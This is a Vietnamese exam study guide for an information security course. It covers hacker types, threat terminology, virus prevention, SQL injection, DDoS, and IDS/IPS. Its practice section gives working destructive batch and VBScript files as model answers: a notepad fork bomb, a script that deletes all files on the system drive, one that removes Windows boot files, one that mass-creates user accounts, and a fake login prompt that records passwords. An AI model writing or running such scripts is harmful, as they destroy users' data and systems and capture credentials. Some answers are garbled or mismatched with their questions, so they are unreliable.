ĐỀ CƯƠNG ÔN TẬP
MÔN: AN TOÀN VÀ BẢO MẬT THÔNG TIN
PHẦN 1: Cấu trúc đề thi
- Hình thức đề thi: Thi viết (tự luận)
- Thời gian: 60 phút
- Không được sử dụng tài liệu khi làm bài
- Cấu trúc của đề thi: 03 câu hỏi (không có phần trắc
nghiệm)
- Phân bổ đề thi:
+ Câu 01: Lý thuyết (3 điểm): Nội dung phần này
tập trung hỏi về một số khái niệm, kiến trúc,…
+ Câu 02: Bài tập (3 điểm): Viết chương trình
Virus bằng Notepad lưu dưới dạng .bat hoặc .vbs
+ Câu 03 (04 điểm): Nêu một số phương pháp tấn
công mạng máy tính

PHẦN 2: Nội dung ôn tập
A./ Dạng câu hỏi lý thuyết (câu 01)
Câu 1: Theo Anh/Chị hiểu thế nào là Hacker và Cracker
?
Gợi ý trả lời:
-Hacker: Hacker là người có thể viết hay chỉnh sửa phần
mềm, phần cứng máy tính bao gồm lập trình, quản
trị và bảo mật. Những người này hiểu rõ hoạt động của hệ
thống máy tính, mạng máy tính và dùng kiến thức của bản


thân để làm thay đổi, chỉnh sửa nó với nhiều mục đích tốt
xấu khác nhau.
-Cracker:Cracker là người có khả năng sửa đổi phần mềm
để gỡ bỏ các biện pháp bảo vệ bản quyền như: chống sao

chép, phiên bản dùng thử giới hạn, kiểm tra số serial, kiểm
tra CD hay các phiền toái trong phần mềm như cửa sổ
thông báo (screennag) và phần mềm quảng cáo (adware).
Họ làm ra các phiên bản cracks, patcher, keygen ... Và đôi
lúc, cracker còn thêm những phần mở rộng cho phần mềm
thông qua các phiên bản cracks của họ.
Câu 2: Anh/ Chị hãy phân loại và làm rõ Hacker theo
hướng hành động thâm nhập ?
Gợi ý trả lời:
Theo hành động thâm nhập thì có 3 loại Hacker chính:
-Hacker mũ đen: là loại hacker mà cả thế giới chống lại
họ, công việc hằng ngày của họ là truy cập trái phép vào
các hệ thống, website, hay thông tin cá nhân một cách trái
phép, khi hacker đột nhập thành công. Có thể là ăn cắp
thông tin bí mật, trộm tài khoản thẻ ngân hàng, thêm bớt
thông tin vào một dữ liệu nào đó… Ngoài những việc trên
hacker mũ đen cũng có thể crack game và phần mềm để hỗ
trợ miễn phí cho người sử dụng. Hacker mũ đen có lẽ là
loại hacker có số lượng nhiều nhất và nguy hiểm nhất trong
cộng đồng internet trên toàn thế giới.
-Hacker mũ trắng: là hacker trái ngược hoàn toàn với
hacker mũ đen, họ là những hacker có luơng tâm, họ là
những hacker sử dụng các kỹ năng và các cách xâm nhập


phục vụ cho những hoạt động luơng thiện và có lợi cho tổ
chức và xã hội.
-Hacker mũ xám: là những hacker trung lập giữa đen và
trắng, trong thực tế số lượng loại hacker này cũng không
phải hiếm gặp. Một hacker mũ xám không đánh cắp thông

tin cá nhân hay gây ra những phiền phức lớn cho những
người quản trị, nhưng họ có thể trở thành tội phạm mạng
từ những việc làm trái đạo đức.
Câu 3: Anh/ Chị hãy so sánh sự giống và khác nhau giữa
Hacker và Cracker( bẻ khóa phần mềm).
Gợi ý trả lời:
-Về giống nhau: Cả Hacker và Cracker đều là những
người tấn công và mục đích là thâm nhập vào hệ thống để
khai thác thông tin.
-Về khác nhau: Hacker thì tập trung vào khai thác và tìm
những lỗ hổng trong các ứng dụng mạng Internet, máy tính
và cả phần mềm, còn Cracker tập trung vào các công việc
như khả năng sửa đổi phần mềm hoặc bỏ các biện pháp bảo
vệ/đăng ký của phần mềm
Câu 4: Anh/ Chị hãy cho biết các khái niệm Threat,
Threat agent, Attack, Vulnerability và Risk trong an
toàn thông tin ?
Gợi ý trả lời:
-Threat (sự đe dọa): Là các mối đe dọa có thể tấn công hệ
thống


-Threat agent (tác nhân đe dọa): Là con người hoặc
phương tiện có khả năng ngây hại hệ thống
-Attack (tấn công): là các hành động tác nhân đe dọa khai
thác lỗ hổng và khả năng bảo mật của hệ thống để truy cập
trái phép, lấy thông tin cơ sở dữ liệu, phá hoại, vô hiệu quá,
sửa hệ thống,...làm hệ thống tê liệt, hư hại hoặc mất mát dữ
liệu
-Vulnerability (lỗ hổng): Là điểm yếu trong bảo mật hệ

thống có thể bị kẻ tấn công khai thác để phá hoại hệ thống
-Risk (nguy cơ, rủi ro): Là khả năng mối đe dọa tấn công
và gây thiệt hại hệ thống.
Câu 5:Anh/ Chị hãy hiểu thế nào Virus máy tính ? Phân
tích một số tác hại của Virus máy tính ?
Gợi ý trả lời:
Virus máy tính ( gọi tắt là Virus ) là đoạn chương trình
có khả năng tư nhân bản, lây nhiễm từ máy tính này qua
máy tính khác bằng nhiều con đường, nhất là qua môi
trường mạng máy tính, Internet và thư điện tử.
Một số tác hại của Virus máy tính
- Tiêu tốn tài nguyên hệ thống
- Phá hủy dữ liệu
- Phá hủy hệ thống
- Đánh cắp dữ liệu
- Mã hóa dữ liệu để tống tiền
- Gây khó chịu khác


Câu 6: Anh/ Chị hãy nêu một số cách lây nhiễm của
Virus máy tính ? Và cách phòng chống Virus máy tính
?
Gợi ý trả lời:
Một số cách lây nhiễm của Virus máy tính:
- Qua việc sao chép các tệp đã bị nhiễm Virus
- Qua các phần mềm bẻ khóa, các phần mềm sao chép
lậu
- Qua các thiết bị nhớ di động
- Qua mạng nội bộ, Internet, đặc biệt là thư điện tử
- Qua các " lỗ hổng " phần mềm

Cách phòng tránh Virus máy tính:
- Hạn chế việc sao chép không cần thiết và không chạy
các chương trình tải từ Internet hoặc sao chép từ máy
khác khi chưa đủ tin cậy.
- Không mở những tệp gửi kèm trong thư điện tử nếu có
nghi ngờ về nguồn gốc hay nội dung thư.
- Không truy cập vào các trang web có nội dung không
lành mạnh.
- Thường xuyên cập nhật các bản sửa lỗi cho các phần
mềm chạy trên máy tính của mình, kể cả hệ điều hành.
- Định kì sao lưu dữ liệu để có thể khôi phục khi bị virus
phá hoại.
- Định kì quét và diệt virus bằng các phần mềm diệt virus
B./ Dạng câu hỏi bài tập (câu 02): Có gợi ý trả lời tham
khảo


Câu 1: Anh/ Chị hãy viết chương trình Virus bằng Notepad
với đuôi .bat cho phép tự động tạo liên tiếp chương trình
Notepad cho đến khi máy tính bị treo.
@echo off
:virus
start %SystemRoot%\system32\notepad.exe
goto virus
Câu 2: Anh/ Chị hãy viết chương trình Virus bằng Notepad
với đuôi .bat cho phép tự động xóa hệ thống windows của
máy tính
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 30 –c “Máy tính sẽ bị tắt trong khoảng

30 giây nữa…”
Hoặc
@echo off
msg *virus đang kích hoạt..*
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Câu 3: Anh/ Chị hãy viết chương trình Virus bằng Notepad
với đuôi .bat cho phép tự động mở các chương trình Word,
Paint, Notepad, Control Panel, Calculator, Explorer và ghi
lại tên đăng nhập, mật khẩu khi gõ vào một tệp tin .txt mặc
định trong ổ đĩa C.
@echo off
:virus
start winword
start mspaint
start notepad
start explorer
start control
start calc
cd “C:Logs”
set /p user=Username:
set /p pass=Password:

echo Username=%user%” Password=”%pass%”
>> Logs.txt
exit
goto virus
Câu 4: Anh/ Chị hãy viết chương trình Virus bằng Notepad
với đuôi .vbs cho phép thực hiện các phím máy tính
(CAPSLOCK, NUMLOCK, SCROLLLOCK) liên tục
nhấp nháy trong mỗi giây một lần.
Set wshShell =wscript.CreateObject("WScript.Shell")


do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
wshshell.sendkeys "~(enter)"
wshshell.sendkeys "{bs}" // phím khoảng cách Space
loop
Câu 5: Anh/ Chị hãy viết chương trình Virus bằng Notepad
với đuôi .bat cho phép thực hiện tạo ít nhất 5 thư mục liên
tiếp, nếu đóng một thư mục nào đó thì các thư mục sẽ tiếp
tục xuất hiện liên tiếp và thông báo sẽ khởi động máy tính
sau thời gian 60 giây.
@echo off
:virus
md folder1
md folder2
md folder3
md folder4

md folder5
start folder1
start folder2
start folder3
start folder4
start folder5
shutdown –r –t 60 –c “Máy tính sẽ bị khởi động lại
trong thời gian 60 giây nữa !!!”


goto virus
Câu 6: Anh/ Chị hãy viết chương trình Virus bằng Notepad
với đuôi .bat cho phép thực hiện tạo các thư mục ngẫu nhiên
trong các ổ đĩa C, D, E, F và sau thời gian 30s máy tính sẽ
tự động tắt.
@echo off
:virus
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
shutdown –s -f -t 30 -c "Máy tính sẽ tắt trong
khoảng 30 giây nữa… "
goto virus
Câu 7: Anh/ Chị hãy viết chương trình Virus bằng Notepad
với đuôi .bat cho phép thực hiện tạo ngẫu nhiên nhiều tài
khoản người dùng
@echo off

:virus
net user %random% /add //Tạo tài khoản người dùng
goto virus


Câu 8: Anh/ Chị hãy viết chương trình Virus bằng Notepad
với đuôi .vbs cho phép thực hiện đóng tất cả các chương
trình đang mở, kể cả windows.
set ws=CreateObject("wscript.shell")
do
ws.sendkeys "%{F4}"
wscript.sleep 5000
loop
C./ Dạng câu hỏi bài tập (câu 03): Có gợi ý trả lời tham
khảo
Câu 1: Anh/ Chị hãy nêu phương pháp tấn công kiểu Manin-the-Middle và cách phòng chống.
Câu 2: Anh/ Chị hãy nêu phương pháp tấn công kiểu ManGoogle Hacking và cách phòng chống.
Câu 3: Anh/ Chị hãy nêu phương pháp tấn công kiểu
Footprinting và cách phòng chống.
Câu 4: Anh/ Chị hãy nêu phương pháp tấn công SQL
Injection và cách phòng chống.
Gợi ý trả lời:
Phương pháp tấn công dạng SQL Injection:
Phương pháp tấn công dạng SQL injection là một kĩ
thuật tấn công lợi dụng lỗ hổng trong việc kiểm tra dữ liệu
nhập trong các ứng dụng web và các thông báo lỗi của hệ
quản trị cơ sở dữ liệu để "tiêm vào" (injection) và thi hành
các câu lệnh SQL bất hợp pháp
Có bốn dạng thông thường bao gồm:
- Vượt qua kiểm tra lúc đăng nhập (authorization bypass)



- Sử dụng câu lện SELECT
- Sử dụng câu lệnh INSERT
- Sử dụng các Stored-procedures
Cách phòng chống kiểu tấn công SQL Injection:
- Cần có cơ chế kiểm soát chặt chẽ và giới hạn quyền xử
lí dữ liệu đến tài khoản người dùng mà ứng dụng web
đang sử dụng
- Các ứng dụng thông thường nên tránh dùng đến các
quyền như dbo hay sa. Quyền càng bị hạn chế, thiệt hại
càng ít.
- Loại bỏ bất kì thông tin kĩ thuật nào chứa trong thông
điệp chuyển xuống cho người dùng khi ứng dụng có lỗi.
Các thông báo lỗi thông thường tiết lộ các chi tiết kĩ thuật
có thể cho phép kẻ tấn công biết được điểm yếu của hệ
thống.
Câu 5: Theo Anh/ Chị, để thực hiện thành công DDoS cần
phải thỏa điều kiện gì? Đánh giá mức độ nguy hại, đề xuất
các biện pháp ngăn chặn, phòng chống các hình thức tấn
công DDoS. Cho ví dụ về 1 trường hợp tấn công DDoS ở
Việt Nam mà các anh chị biết.
Gợi ý trả lời:
Điều kiện để thực hiện thành công DDoS ?
 SYN Flood Attack
 Ping Flood Attack (Ping of Death)
 Teardrop Attack


 Peer-to-Peer Attacks

Mức độ nguy hại của tấn công từ chối dịch vụ lan tràn
DDoS
- Tê liệt các dịch vụ giao dịch với hệ thống
- Thiệt hại về thời gian, tài chính của đơn vị
Một số biện pháp ngăn chặn, phòng chống các hình
thức tấn công DDoS hiện nay và cho ví dụ về tấn công
DDoS ở Việt Nam mà các Anh/ Chị biết ?
1. Khi phát hiện máy chủ bị tấn công hãy nhanh chóng
truy tìm địa chỉ IP đó và cấm không cho gửi dữ liệu đến
máy chủ.
2. Dùng tính năng lọc dữ liệu của router/firewall để loại
bỏ các packet không mong muốn, giảm lượng lưu thông
trên mạng và tải của máy chủ.
3. Sử dụng các tính năng cho phép đặt rate limit trên
router/firewall để hạn chế số lượng packet vào hệ thống.
4. Nếu bị tấn công do lỗi của phần mềm hay thiết bị thì
nhanh chóng cập nhật các bản sửa lỗi cho hệ thống đó
hoặc thay thế.
5. Dùng một số cơ chế, công cụ, phần mềm để chống lại
TCP SYN Flooding.
6. Tắt các dịch vụ khác nếu có trên máy chủ để giảm tải
và có thể đáp ứng tốt hơn. Nếu được có thể nâng cấp các
thiết bị phần cứng để nâng cao khả năng đáp ứng của hệ
thống hay sử dụng thêm các máy chủ cùng tính năng khác
để phân chia tải.
7. Tạm thời chuyển máy chủ sang một địa chỉ khác


Câu 6: Anh/ Chị hãy trình bày khái niệm và chức năng hệ
thống phát hiện xâm nhập trái phép IDS (Intrusion

Detection System).
Gợi ý trả lời:
Khái niệm IDS: IDS (Intrusion Detection System- hệ
thống phát hiện xâm nhập) là hệ thống phần cứng hoặc
phần mềm có chức năng giám sát, phân tích lưu lượng
mạng, các hoạt động khả nghi và cảnh báo cho hệ thống,
hoặc nhà quản trị. IDS cũng có thể phân biệt giữa những
tấn công vào hệ thống từ bên trong (từ những người dùng
nội bộ) hay tấn công từ bên ngoài (từ các hacker). IDS phát
hiện dựa trên các dấu hiệu đặc biệt về các nguy cơ đã biết
(giống như cách các phần mềm diệt virus dựa vào các dấu
hiệu đặc biệt để phát hiện và diệt virus), hay dựa trên so
sánh lưu lượng mạng hiện tại với baseline (thông số đo đạc
chuẩn của hệ thống) để tìm ra các dấu hiệu bất thường.
Chức năng của IDS:
Chức năng quan trọng nhất là: Giám sát – Cảnh báo – Bảo
vệ:
- Giám sát: thực hiện giám sát lưu lượng mạng và các
hoạt động khả nghi.
- Cảnh báo: báo cáo về tình trạng mạng cho hệ thống
và nhà quản trị.
- Bảo vệ: sử dụng những thiết lập mặc định và cấu
hình từ nhà quản trị để có những hành động tương
ứng phù hợp chống lại kẻ xâm nhập và phá hoại.


Chức năng mở rộng: IDS cần có khả năng phân biệt tấn
công từ bên trong và tấn công từ bên ngoài. Ngoài ra, IDS
cũng có khả năng phát hiện những dấu hiệu bất thường dựa
trên những gì đã biết hoặc nhờ vào sự so sánh lưu lượng

mạng hiện tại với baseline.

Câu 7: Anh/ Chị hãy trình bày khái niệm và phân loại hệ
thống ngăn chặn xâm nhập trái phép IPS (Intrusion
Prevention System)
Gợi ý trả lời:
Khái niệm IPS: Hệ thống IPS (Intrusion Prevention
System) là một kỹ thuật an ninh mới, kết hợp các ưu điểm
của kỹ thuật firewall với hệ thống phát hiện xâm nhập IDS,
có khả năng phát hiện sự xâm nhập, các cuộc tấn công và
tự động ngăn chặn các cuộc tấn công đó.
IPS không đơn giản chỉ dò các cuộc tấn công, chúng có
khả năng ngăn chặn các cuộc hoặc cản trở các cuộc tấn công


đó. Chúng cho phép tổ chức ưu tiên, thực hiện các bước để
ngăn chặn lại sự xâm nhập. Phần lớn hệ thống IPS được đặt
ở vành đai mạng, dủ khả năng bảo vệ tất cả các thiết bị trong
mạng
Phân loại hệ thống IPS:
-IPS ngoài luồng(Promiscuous Mode IPS)
Hệ thống IPS ngoài luồng không can thiệp trực tiếp
vào luồng dữ liệu. Luồng dữ liệu vào hệ thống mạng sẽ
cùng đi qua tường lửa và IPS. IPS có thể kiểm soát luồng
dữ liệu vào, phân tích và phát hiện các dấu hiệu của sự xâm
nhập, tấn công. Với vị trí này, IPS có thể quản lý bức tường
lửa, chỉ dẫn nó chặn lại các hành động nghi ngờ mà không
làm ảnh hưởng đến tốc độ lưu thông của mạng.
-IPS trong luồng (In-line IPS)
Vị trí IPS nằm trước bức tường lửa, luồng dữ liệu

phải đi qua IPS trước khi tới bức tường lửa. Điểm khác
chính so với IPS ngoài luồng là có thêm chức nǎng chặn
lưu thông (traffic-blocking). Điều đó làm cho IPS có thể
ngǎn chặn luồng giao thông nguy hiểm nhanh hơn so với
IPS ngoài luồng (Promiscuous Mode IPS). Tuy nhiên, vị trí
này sẽ làm cho tốc độ luồng thông tin ra vào mạng chậm
hơn.
Với mục tiêu ngăn chặn các cuộc tấn công, hệ thống
IPS phải hoạt động theo thời gian thực. Tốc độ họat động
của hệ thống là một yếu tố rất quan trọng. Qua trình phát
hiện xâm nhập phải đủ nhanh để có thể ngăn chặn các cuộc
tấn công ngay lập tức. Nếu không đáp ứng được điều này


thì các cuộc tấn công đã được thực hiện xong và hệ thống
IPS là vô nghĩa.
Câu 8: Anh/ Chị hãy trình bày các khái niệm, kiến trúc và
cơ chế hoạt động của tường lửa Firewall, IPSec, VPN,…

Chúc các bạn thi tốt !